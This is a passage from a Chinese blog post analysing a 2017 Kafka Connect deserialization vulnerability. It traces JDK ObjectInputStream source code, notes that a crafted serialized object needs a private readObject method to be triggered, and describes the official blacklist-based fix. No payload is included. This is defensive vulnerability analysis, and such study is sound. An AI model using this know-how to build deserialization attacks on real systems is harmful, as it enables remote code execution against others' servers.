class="line"></span><br><span class="line">### ObjectInputStream </span><br><span class="line">调用 `ObjectInputStream` 构造方法。可以看到，基本都是一些初始化操作。源码如下：</span><br><span class="line"></span><br><span class="line">```java</span><br><span class="line">		public ObjectInputStream(InputStream in) throws IOException &#123;</span><br><span class="line">	        verifySubclass();</span><br><span class="line">	        bin = new BlockDataInputStream(in);</span><br><span class="line">	        handles = new HandleTable(10);</span><br><span class="line">	        vlist = new ValidationList();</span><br><span class="line">	        enableOverride = false;</span><br><span class="line">	        readStreamHeader();</span><br><span class="line">	        bin.setBlockDataMode(true);</span><br><span class="line">	    &#125;</span><br></pre></td></tr></table></figure>
<h3 id="readObject_28_29"><a href="#readObject_28_29" class="headerlink" title="readObject()"></a>readObject()</h3><p>再回到 <code>FileOffsetBackingStore</code> 类的 <code>start()</code> 方法调用的 <code>load()</code> 方法中，在构造完 <code>ObjectInputStream</code> 对象后，调用</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Object obj = is.readObject();</span><br></pre></td></tr></table></figure>
<p>实际调用 <code>ObjectInputStream</code> 类中的 <code>readObject()</code> 方法。源码如下</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">final</span> Object <span class="title">readObject</span><span class="params">()</span></span><br><span class="line">       <span class="keyword">throws</span> IOException, ClassNotFoundException</span><br><span class="line">   </span>&#123;</span><br><span class="line">       <span class="keyword">if</span> (enableOverride) &#123;</span><br><span class="line">           <span class="keyword">return</span> readObjectOverride();</span><br><span class="line">       &#125;</span><br><span class="line">	</span><br><span class="line">       <span class="comment">// if nested read, passHandle contains handle of enclosing object</span></span><br><span class="line">       <span class="keyword">int</span> outerHandle = passHandle;</span><br><span class="line">       <span class="keyword">try</span> &#123;</span><br><span class="line">           Object obj = readObject0(<span class="keyword">false</span>);</span><br><span class="line">           handles.markDependency(outerHandle, passHandle);</span><br><span class="line">           ClassNotFoundException ex = handles.lookupException(passHandle);</span><br><span class="line">           <span class="keyword">if</span> (ex != <span class="keyword">null</span>) &#123;</span><br><span class="line">               <span class="keyword">throw</span> ex;</span><br><span class="line">           &#125;</span><br><span class="line">           <span class="keyword">if</span> (depth == <span class="number">0</span>) &#123;</span><br><span class="line">               vlist.doCallbacks();</span><br><span class="line">           &#125;</span><br><span class="line">           <span class="keyword">return</span> obj;</span><br><span class="line">       &#125; <span class="keyword">finally</span> &#123;</span><br><span class="line">           passHandle = outerHandle;</span><br><span class="line">           <span class="keyword">if</span> (closed &amp;&amp; depth == <span class="number">0</span>) &#123;</span><br><span class="line">               clear();</span><br><span class="line">           &#125;</span><br><span class="line">       &#125;</span><br><span class="line">   &#125;</span><br></pre></td></tr></table></figure>
<p>继续调用 <code>ObjectInputStream</code> 中的 <code>readObject0()</code> 方法。</p>
<p><code>readObject0()</code> 方法中关键源码如下：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br></pre></td><td class="code"><pre><span class="line">		<span class="keyword">switch</span> (tc) &#123;</span><br><span class="line">                <span class="keyword">case</span> TC_NULL:</span><br><span class="line">                    <span class="keyword">return</span> readNull();</span><br><span class="line"></span><br><span class="line">                <span class="keyword">case</span> TC_REFERENCE:</span><br><span class="line">                    <span class="keyword">return</span> readHandle(unshared);</span><br><span class="line"></span><br><span class="line">                <span class="keyword">case</span> TC_CLASS:</span><br><span class="line">                    <span class="keyword">return</span> readClass(unshared);</span><br><span class="line"></span><br><span class="line">                <span class="keyword">case</span> TC_CLASSDESC:</span><br><span class="line">                <span class="keyword">case</span> TC_PROXYCLASSDESC:</span><br><span class="line">                    <span class="keyword">return</span> readClassDesc(unshared);</span><br><span class="line"></span><br><span class="line">                <span class="keyword">case</span> TC_STRING:</span><br><span class="line">                <span class="keyword">case</span> TC_LONGSTRING:</span><br><span class="line">                    <span class="keyword">return</span> checkResolve(readString(unshared));</span><br><span class="line"></span><br><span class="line">                <span class="keyword">case</span> TC_ARRAY:</span><br><span class="line">                    <span class="keyword">return</span> checkResolve(readArray(unshared));</span><br><span class="line"></span><br><span class="line">                <span class="keyword">case</span> TC_ENUM:</span><br><span class="line">                    <span class="keyword">return</span> checkResolve(readEnum(unshared));</span><br><span class="line"></span><br><span class="line">                <span class="keyword">case</span> TC_OBJECT:</span><br><span class="line">                    <span class="keyword">return</span> checkResolve(readOrdinaryObject(unshared));</span><br><span class="line"> </span><br><span class="line">``` </span><br><span class="line"></span><br><span class="line">可以看到会对传入参数进行匹配，因为构造的恶意对象为Object类型，因此会触发 `<span class="keyword">case</span> TC_OBJECT` 这个条件。继续调用 `readOrdinaryObject()` 方法。</span><br><span class="line"></span><br><span class="line">关键代码如下：</span><br><span class="line"> </span><br><span class="line">```<span class="function">java</span><br><span class="line">		<span class="title">if</span> <span class="params">(desc.isExternalizable()</span>) </span>&#123;</span><br><span class="line">            readExternalData((Externalizable) obj, desc);</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            readSerialData(obj, desc);</span><br><span class="line">        &#125;</span><br><span class="line">``` </span><br><span class="line"></span><br><span class="line">调用 `readSerialData(obj, desc)` 方法。关键源码如下，`slotDesc.invokeReadObject(obj, <span class="keyword">this</span>);`：</span><br><span class="line"></span><br><span class="line">```java</span><br><span class="line">		<span class="keyword">try</span> &#123;</span><br><span class="line">            curContext = <span class="keyword">new</span> SerialCallbackContext(obj, slotDesc);</span><br><span class="line"></span><br><span class="line">            bin.setBlockDataMode(<span class="keyword">true</span>);</span><br><span class="line">            slotDesc.invokeReadObject(obj, <span class="keyword">this</span>);</span><br><span class="line">        &#125; <span class="keyword">catch</span> (ClassNotFoundException ex) &#123;</span><br><span class="line">        	handles.markException(passHandle, ex);</span><br><span class="line">        &#125; <span class="keyword">finally</span> &#123;</span><br><span class="line">        	curContext.setUsed();</span><br><span class="line">            curContext = oldContext;</span><br><span class="line">        &#125;</span><br></pre></td></tr></table></figure>
<h3 id="ObjectStreamClass__u7C7B_u7684_u53CD_u5C04_u8C03_u7528"><a href="#ObjectStreamClass__u7C7B_u7684_u53CD_u5C04_u8C03_u7528" class="headerlink" title="ObjectStreamClass 类的反射调用"></a>ObjectStreamClass 类的反射调用</h3><p>调用 <code>ObjectStreamClass</code> 类的 <code>invokeReadObject()</code> 方法。源码如下：</p>
<pre><code class="java"><span class="function"><span class="keyword">void</span> <span class="title">invokeReadObject</span><span class="params">(Object obj, ObjectInputStream in)</span>
    <span class="keyword">throws</span> ClassNotFoundException, IOException,
           UnsupportedOperationException
</span>{
    <span class="keyword">if</span> (readObjectMethod != <span class="keyword">null</span>) {
        <span class="keyword">try</span> {
            readObjectMethod.invoke(obj, <span class="keyword">new</span> Object[]{ in });
        } <span class="keyword">catch</span> (InvocationTargetException ex) {
            Throwable th = ex.getTargetException();
            <span class="keyword">if</span> (th <span class="keyword">instanceof</span> ClassNotFoundException) {
                <span class="keyword">throw</span> (ClassNotFoundException) th;
            } <span class="keyword">else</span> <span class="keyword">if</span> (th <span class="keyword">instanceof</span> IOException) {
                <span class="keyword">throw</span> (IOException) th;
            } <span class="keyword">else</span> {
                throwMiscException(th);
            }
        } <span class="keyword">catch</span> (IllegalAccessException ex) {
            <span class="comment">// should not occur, as access checks have been suppressed</span>
            <span class="keyword">throw</span> <span class="keyword">new</span> InternalError();
        }
    } <span class="keyword">else</span> {
        <span class="keyword">throw</span> <span class="keyword">new</span> UnsupportedOperationException();
    }
}
</code></pre>
<p>这时候可以看到这行代码，就是反射调用了。</p>
<pre><code class="java">readObjectMethod.invoke(obj, <span class="keyword">new</span> Object[]{ in });
</code></pre>
<p>再看一下 <code>readObjectMethod</code> ，这个 <code>ObjectStreamClass</code> 类的成员变量的定义。</p>
<p>在 <code>ObjectStreamClass</code> 类的构造方法中，可以看到，<code>readObjectMethod</code> 定义如下：</p>
<pre><code class="java">readObjectMethod = getPrivateMethod(cl, <span class="string">"readObject"</span>,
                            <span class="keyword">new</span> Class&lt;?&gt;[] { ObjectInputStream.class },
                            Void.TYPE);
</code></pre>
<p>第二个参数为反射调用的方法名称，即 <code>readObject</code>；第三个参数为反射调用的方法参数，为 <code>ObjectInputStream</code> 类的对象；最后一个参数为反射调用的方法返回值，即 <code>void</code> 类型。</p>
<p>因此，在构造恶意序列化对象时，实现如下的方法即可。</p>
<pre><code class="java"><span class="function"><span class="keyword">private</span> <span class="keyword">void</span> <span class="title">readObject</span><span class="params">(ObjectInputStream input)</span></span>
</code></pre>
<h1 id="6-_u89E3_u51B3_u65B9_u6848"><a href="#6-_u89E3_u51B3_u65B9_u6848" class="headerlink" title="6.解决方案"></a>6.解决方案</h1><p>kafka官方已经修复了该漏洞，如下为commit链接。</p>
<p><a href="https://github.com/apache/kafka/commit/da42977a004dc0c9d29c8c28f0f0cd2c06b889ef" title="https://github.com/apache/kafka/commit/da42977a004dc0c9d29c8c28f0f0cd2c06b889ef" target="_blank" rel="external">https://github.com/apache/kafka/commit/da42977a004dc0c9d29c8c28f0f0cd2c06b889ef</a></p>
<p><img src="/images/kafka_deserialization_bug_fix_1.jpg" alt="kafka_deserialization_bug_fix_1"></p>
<p><img src="/images/kafka_deserialization_bug_fix_2.jpg" alt="kafka_deserialization_bug_fix_2"></p>
<p><img src="/images/kafka_deserialization_bug_fix_3.jpg" alt="kafka_deserialization_bug_fix_3"></p>
<p>通过fix代码可以看到新加入了自己实现的 <code>org.apache.kafka.connect.util.SafeObjectInputStream</code> 而用来替代原有的JDK中的 <code>java.io.ObjectInputStream</code> 类。</p>
<p>而 <code>SafeObjectInputStream</code> 继承了 <code>ObjectInputStream</code> ，代码里加入一个黑名单列表，并使用<code>resolveClass.isBlacklisted()</code> 过滤掉黑名单类。</p>
<p>预计在0.11.0.1版本推出该功能。</p>
<h1 id="7-_u53C2_u8003_u94FE_u63A5"><a href="#7-_u53C2_u8003_u94FE_u63A5" class="headerlink" title="7.参考链接"></a>7.参考链接</h1><ol>
<li><a href="https://github.com/apache/kafka/" title="https://github.com/apache/kafka/" target="_blank" rel="external">https://github.com/apache/kafka/</a></li>
<li><a href="http://kafka.apache.org/" title="http://kafka.apache.org/" target="_blank" rel="external">http://kafka.apache.org/</a></li>
<li><a href="http://seclists.org/oss-sec/2017/q3/184" title="http://seclists.org/oss-sec/2017/q3/184" target="_blank" rel="external">http://seclists.org/oss-sec/2017/q3/184</a></li>
<li><a href="http://www.openwall.com/lists/oss-security/2017/07/19/1" title="http://www.openwall.com/lists/oss-security/2017/07/19/1" target="_blank" rel="external">http://www.openwall.com/lists/oss-security/2017/07/19/1</a></li>
<li><a href="http://bobao.360.cn/learning/detail/4190.html" title="http://bobao.360.cn/learning/detail/4190.html" target="_blank" rel="external">http://bobao.360.cn/learning/detail/4190.html</a></li>
<li><a href="http://seclist.us/ysoserial-v-0-0-3-a-proof-of-concept-tool-for-generating-payloads-that-exploit-unsafe-java-object-deserialization.html" title="http://seclist.us/ysoserial-v-0-0-3-a-proof-of-concept-tool-for-generating-payloads-that-exploit-unsafe-java-object-deserialization.html" target="_blank" rel="external">http://seclist.us/ysoserial-v-0-0-3-a-proof-of-concept-tool-for-generating-payloads-that-exploit-unsafe-java-object-deserialization.html</a></li>
<li><a href="https://github.com/frohoff/ysoserial/" title="https://github.com/frohoff/ysoserial/" target="_blank" rel="external">https://github.com/frohoff/ysoserial/</a></li>
<li><a href="https://github.com/apache/kafka/commit/da42977a004dc0c9d29c8c28f0f0cd2c06b889ef" title="https://github.com/apache/kafka/commit/da42977a004dc0c9d29c8c28f0f0cd2c06b889ef" target="_blank" rel="external">https://github.com/apache/kafka/commit/da42977a004dc0c9d29c8c28f0f0cd2c06b889ef</a></li>
</ol>

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/Kafka/" rel="tag"># Kafka</a>
          
            <a href="/tags/Scala/" rel="tag"># Scala</a>
          
            <a href="/tags/消息中间件/" rel="tag"># 消息中间件</a>
          
        </div>
      

      
        
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2017/09/13/Kafka-简介/" rel="next" title="">
                <i class="fa fa-chevron-left"></i> 
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
      <div id="disqus_thread">
        <noscript>
          Please enable JavaScript to view the
          <a href="https://disqus.com/?ref_noscript">comments powered by Disqus.</a>
        </noscript>
      </div>
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="/images/pug.jpg"
               alt="Shi Yueqi" />
          <p class="site-author-name" itemprop="name">Shi Yueqi</p>
           
              <p class="site-description motion-element" itemprop="description">In me the tiger sniffs the rose.</p>
          
        </div>
        <nav class="site-state motion-element">

          
            <div class="site-state-item site-state-posts">
              <a href="/archives">
                <span class="site-state-item-count">13</span>
                <span class="site-state-item-name">日志</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-categories">
              <a href="/categories/index.html">
                <span class="site-state-item-count">1</span>
                <span class="site-state-item-name">分类</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-tags">
              <a href="/tags/index.html">
                <span class="site-state-item-count">5</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        

        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
                <a href="https://github.com/shiyueqi" target="_blank" title="GitHub">
                  
                    <i class="fa fa-fw fa-github"></i>
                  
                  GitHub
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="http://weibo.com/shiyueqi107" target="_blank" title="微博">
                  
                    <i class="fa fa-fw fa-globe"></i>
                  
                  微博
                </a>
              </span>
            
          
        </div>

        
        

        
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#1-Kafka_u53CD_u5E8F_u5217_u5316_u6F0F_u6D1E_u7B80_u4ECB"><span class="nav-number">1.</span> <span class="nav-text">1.Kafka反序列化漏洞简介</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#2-_u6F0F_u6D1E_u6982_u8FF0"><span class="nav-number">2.</span> <span class="nav-text">2.漏洞概述</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#3-_u6F0F_u6D1E_u8BE6_u60C5"><span class="nav-number">3.</span> <span class="nav-text">3.漏洞详情</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#5-_u6E90_u7801_u5206_u6790"><span class="nav-number">4.</span> <span class="nav-text">5.源码分析</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#u6982_u8FF0"><span class="nav-number">4.1.</span> <span class="nav-text">概述</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#u6E90_u7801_u8DDF_u8E2A"><span class="nav-number">4.2.</span> <span class="nav-text">源码跟踪</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#FileOffsetBackingStore"><span class="nav-number">4.2.1.</span> <span class="nav-text">FileOffsetBackingStore</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#FileInputStream_u7C7B"><span class="nav-number">4.2.2.</span> <span class="nav-text">FileInputStream类</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#readObject_28_29"><span class="nav-number">4.2.3.</span> <span class="nav-text">readObject()</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#ObjectStreamClass__u7C7B_u7684_u53CD_u5C04_u8C03_u7528"><span class="nav-number">4.2.4.</span> <span class="nav-text">ObjectStreamClass 类的反射调用</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#6-_u89E3_u51B3_u65B9_u6848"><span class="nav-number">5.</span> <span class="nav-text">6.解决方案</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#7-_u53C2_u8003_u94FE_u63A5"><span class="nav-number">6.</span> <span class="nav-text">7.参考链接</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy; 
  <span itemprop="copyrightYear">2017</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Shi Yueqi</span>
</div>


<div class="powered-by">
  由 <a class="theme-link" href="https://hexo.io">Hexo</a> 强力驱动
</div>

<div class="theme-info">
  主题 -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Pisces
  </a>
</div>


        

        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  






  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.0"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.0"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.0"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.0"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.0"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.0"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.0"></script>



  


  

    
      <script id="dsq-count-scr" src="https://shiyueqi.disqus.com/count.js" async></script>
    

    
      <script type="text/javascript">
        var disqus_config = function () {
          this.page.url = 'http://shiyueqi.github.io/2017/09/13/Kafka反序列化漏洞/';
          this.page.identifier = '2017/09/13/Kafka反序列化漏洞/';
          this.page.title = 'Kafka反序列化漏洞分析';
        };
        var d = document, s = d.createElement('script');
        s.src = 'https://shiyueqi.disqus.com/embed.js';
        s.setAttribute('data-timestamp', '' + +new Date());
        (d.head || d.body).appendChild(s);
      </script>
    

  




	





  





  





  






  





  

  
  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.1.js"></script>
  <script>AV.initialize("N7gFtBpJT2kRFRxKVGQNisQ3-gzGzoHsz", "svhqcJfvubefdP37LD07sxhX");</script>
  <script>
    function showTime(Counter) {
      var query = new AV.Query(Counter);
      var entries = [];
      var $visitors = $(".leancloud_visitors");

      $visitors.each(function () {
        entries.push( $(this).attr("id").trim() );
      });

      query.containedIn('url', entries);
      query.find()
        .done(function (results) {
          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';

          if (results.length === 0) {
            $visitors.find(COUNT_CONTAINER_REF).text(0);
            return;
          }

          for (var i = 0; i < results.length; i++) {
            var item = results[i];
            var url = item.get('url');
            var time = item.get('time');
            var element = document.getElementById(url);

            $(element).find(COUNT_CONTAINER_REF).text(time);
          }
          for(var i = 0; i < entries.length; i++) {
            var url = entries[i];
            var element = document.getElementById(url);
            var countSpan = $(element).find(COUNT_CONTAINER_REF);
            if( countSpan.text() == '') {
              countSpan.text(0);
            }
          }
        })
        .fail(function (object, error) {
          console.log("Error: " + error.code + " " + error.message);
        });
    }

    function addCount(Counter) {
      var $visitors = $(".leancloud_visitors");
      var url = $visitors.attr('id').trim();
      var title = $visitors.attr('data-flag-title').trim();
      var query = new AV.Query(Counter);

      query.equalTo("url", url);
      query.find({
        success: function(results) {
          if (results.length > 0) {
            var counter = results[0];
            counter.fetchWhenSave(true);
            counter.increment("time");
            counter.save(null, {
              success: function(counter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(counter.get('time'));
              },
              error: function(counter, error) {
                console.log('Failed to save Visitor num, with error message: ' + error.message);
              }
            });
          } else {
            var newcounter = new Counter();
            /* Set ACL */
            var acl = new AV.ACL();
            acl.setPublicReadAccess(true);
            acl.setPublicWriteAccess(true);
            newcounter.setACL(acl);
            /* End Set ACL */
            newcounter.set("title", title);
            newcounter.set("url", url);
            newcounter.set("time", 1);
            newcounter.save(null, {
              success: function(newcounter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(newcounter.get('time'));
              },
              error: function(newcounter, error) {
                console.log('Failed to create');
              }
            });
          }
        },
        error: function(error) {
          console.log('Error:' + error.code + " " + error.message);
        }
      });
    }

    $(function() {
      var Counter = AV.Object.extend("Counter");
      if ($('.leancloud_visitors').length == 1) {
        addCount(Counter);
      } else if ($('.post-title-link').length > 1) {
        showTime(Counter);
      }
    });
  </script>



  

  

  

</body>
</html>
